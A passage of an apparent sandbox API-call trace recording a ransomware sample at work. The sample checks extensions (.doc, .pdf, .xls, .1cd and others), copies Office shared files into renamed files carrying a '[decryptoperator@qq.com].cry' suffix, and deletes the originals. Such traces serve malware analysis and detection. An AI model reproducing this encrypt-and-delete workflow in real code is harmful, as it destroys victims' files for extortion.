-1 [0051.473] lstrlenW (lpString=".7z") returned 3 [0051.473] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0051.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.473] lstrlenW (lpString=".dbf") returned 4 [0051.473] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0051.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.473] lstrlenW (lpString=".1cd") returned 4 [0051.473] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0051.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.473] lstrlenW (lpString=".jpg") returned 4 [0051.473] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0051.473] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0051.474] lstrlenW (lpString="MSOEURO.DLL") returned 11 [0051.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.474] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=31104) returned 1 [0051.474] CloseHandle (hObject=0x228) returned 1 [0051.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 0x20 [0051.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.474] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.474] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.475] GetLastError () returned 0x0 [0051.475] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x7980, lpOverlapped=0x0) returned 1 [0051.594] WriteFile (in: hFile=0x20c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x7990, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x7990, lpOverlapped=0x0) returned 1 [0051.604] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.604] WriteFile (in: hFile=0x20c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.604] SetEndOfFile (hFile=0x20c) returned 1 [0051.604] CloseHandle (hObject=0x20c) returned 1 [0051.605] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.605] SetEndOfFile (hFile=0x228) returned 1 [0051.608] CloseHandle (hObject=0x228) returned 1 [0051.608] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.608] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\msoeuro.dll")) returned 1 [0051.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.608] lstrlenW (lpString=".doc") returned 4 [0051.608] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString=".docx") returned 5 [0051.609] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0051.609] lstrlenW (lpString=".pdf") returned 4 [0051.609] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString=".xls") returned 4 [0051.609] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString=".xlsx") returned 5 [0051.609] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0051.609] lstrlenW (lpString=".ppt") returned 4 [0051.609] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.609] lstrlenW (lpString=".zip") returned 4 [0051.609] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString=".rar") returned 4 [0051.609] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString=".bz2") returned 4 [0051.609] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.609] lstrlenW (lpString=".7z") returned 3 [0051.609] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.609] lstrlenW (lpString=".dbf") returned 4 [0051.609] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.609] lstrlenW (lpString=".1cd") returned 4 [0051.609] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.609] lstrlenW (lpString=".jpg") returned 4 [0051.609] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.609] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.609] lstrlenW (lpString=".doc") returned 4 [0051.609] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString=".docx") returned 5 [0051.609] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0051.609] lstrlenW (lpString=".pdf") returned 4 [0051.609] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0051.609] lstrlenW (lpString=".xls") returned 4 [0051.610] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0051.610] lstrlenW (lpString=".xlsx") returned 5 [0051.610] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0051.610] lstrlenW (lpString=".ppt") returned 4 [0051.610] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0051.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.610] lstrlenW (lpString=".zip") returned 4 [0051.610] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0051.610] lstrlenW (lpString=".rar") returned 4 [0051.610] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0051.610] lstrlenW (lpString=".bz2") returned 4 [0051.610] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0051.610] lstrlenW (lpString=".7z") returned 3 [0051.610] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0051.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.610] lstrlenW (lpString=".dbf") returned 4 [0051.610] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0051.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.610] lstrlenW (lpString=".1cd") returned 4 [0051.610] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0051.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\MSOEURO.DLL") returned 63 [0051.610] lstrlenW (lpString=".jpg") returned 4 [0051.610] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0051.610] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0051.610] lstrlenW (lpString="offfiltx.dll") returned 12 [0051.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.637] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1486736) returned 1 [0051.637] CloseHandle (hObject=0x200) returned 1 [0051.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 0x20 [0051.637] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0051.637] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.637] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0051.638] GetLastError () returned 0x0 [0051.638] ReadFile (in: hFile=0x200, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0051.727] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0051.745] ReadFile (in: hFile=0x200, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x6afa0, lpOverlapped=0x0) returned 1 [0051.842] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x6afb0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x6afb0, lpOverlapped=0x0) returned 1 [0051.861] ReadFile (in: hFile=0x200, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.861] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.862] SetEndOfFile (hFile=0x190) returned 1 [0051.862] CloseHandle (hObject=0x190) returned 1 [0051.862] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.862] SetEndOfFile (hFile=0x200) returned 1 [0051.874] CloseHandle (hObject=0x200) returned 1 [0051.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.874] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll")) returned 1 [0051.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.874] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.874] lstrlenW (lpString=".doc") returned 4 [0051.874] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString=".docx") returned 5 [0051.875] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0051.875] lstrlenW (lpString=".pdf") returned 4 [0051.875] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString=".xls") returned 4 [0051.875] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString=".xlsx") returned 5 [0051.875] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0051.875] lstrlenW (lpString=".ppt") returned 4 [0051.875] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.875] lstrlenW (lpString=".zip") returned 4 [0051.875] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString=".rar") returned 4 [0051.875] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString=".bz2") returned 4 [0051.875] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.875] lstrlenW (lpString=".7z") returned 3 [0051.875] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0051.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.875] lstrlenW (lpString=".dbf") returned 4 [0051.875] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.875] lstrlenW (lpString=".1cd") returned 4 [0051.875] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.875] lstrlenW (lpString=".jpg") returned 4 [0051.875] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.875] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.875] lstrlenW (lpString=".doc") returned 4 [0051.875] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0051.875] lstrlenW (lpString=".docx") returned 5 [0051.876] lstrcmpiW (lpString1=".docx", lpString2="x.dll") returned -1 [0051.876] lstrlenW (lpString=".pdf") returned 4 [0051.876] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0051.876] lstrlenW (lpString=".xls") returned 4 [0051.876] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0051.876] lstrlenW (lpString=".xlsx") returned 5 [0051.876] lstrcmpiW (lpString1=".xlsx", lpString2="x.dll") returned -1 [0051.876] lstrlenW (lpString=".ppt") returned 4 [0051.876] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0051.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.876] lstrlenW (lpString=".zip") returned 4 [0051.876] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0051.876] lstrlenW (lpString=".rar") returned 4 [0051.876] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0051.876] lstrlenW (lpString=".bz2") returned 4 [0051.876] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0051.876] lstrlenW (lpString=".7z") returned 3 [0051.876] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0051.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.876] lstrlenW (lpString=".dbf") returned 4 [0051.876] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0051.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.876] lstrlenW (lpString=".1cd") returned 4 [0051.876] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0051.876] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 67 [0051.876] lstrlenW (lpString=".jpg") returned 4 [0051.876] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0051.876] lstrcmpiW (lpString1=".FNT", lpString2=".cry") returned 1 [0051.876] lstrlenW (lpString="CGMIMP32.FNT") returned 12 [0051.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.961] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=606062) returned 1 [0051.962] CloseHandle (hObject=0x228) returned 1 [0051.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 0x20 [0051.962] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.962] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.962] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.962] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.962] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0051.962] GetLastError () returned 0x0 [0051.963] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x93f6e, lpOverlapped=0x0) returned 1 [0052.096] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x93f70, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x93f70, lpOverlapped=0x0) returned 1 [0052.104] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.104] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.104] SetEndOfFile (hFile=0x1f0) returned 1 [0052.153] CloseHandle (hObject=0x1f0) returned 1 [0052.153] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.153] SetEndOfFile (hFile=0x228) returned 1 [0052.159] CloseHandle (hObject=0x228) returned 1 [0052.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0052.159] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 1 [0052.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.160] lstrlenW (lpString=".doc") returned 4 [0052.160] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0052.177] lstrlenW (lpString=".docx") returned 5 [0052.177] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0052.177] lstrlenW (lpString=".pdf") returned 4 [0052.177] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0052.177] lstrlenW (lpString=".xls") returned 4 [0052.177] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0052.177] lstrlenW (lpString=".xlsx") returned 5 [0052.177] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0052.177] lstrlenW (lpString=".ppt") returned 4 [0052.177] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0052.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.177] lstrlenW (lpString=".zip") returned 4 [0052.177] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0052.177] lstrlenW (lpString=".rar") returned 4 [0052.177] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0052.177] lstrlenW (lpString=".bz2") returned 4 [0052.177] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0052.177] lstrlenW (lpString=".7z") returned 3 [0052.177] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0052.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.177] lstrlenW (lpString=".dbf") returned 4 [0052.178] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0052.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.178] lstrlenW (lpString=".1cd") returned 4 [0052.178] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0052.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.178] lstrlenW (lpString=".jpg") returned 4 [0052.178] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0052.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.178] lstrlenW (lpString=".doc") returned 4 [0052.178] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0052.178] lstrlenW (lpString=".docx") returned 5 [0052.178] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0052.178] lstrlenW (lpString=".pdf") returned 4 [0052.178] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0052.178] lstrlenW (lpString=".xls") returned 4 [0052.178] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0052.178] lstrlenW (lpString=".xlsx") returned 5 [0052.178] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0052.178] lstrlenW (lpString=".ppt") returned 4 [0052.178] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0052.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.178] lstrlenW (lpString=".zip") returned 4 [0052.178] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0052.178] lstrlenW (lpString=".rar") returned 4 [0052.178] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0052.178] lstrlenW (lpString=".bz2") returned 4 [0052.178] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0052.178] lstrlenW (lpString=".7z") returned 3 [0052.178] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0052.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.178] lstrlenW (lpString=".dbf") returned 4 [0052.178] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0052.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0052.178] lstrlenW (lpString=".1cd") returned 4 [0052.179] lstrcmpiW 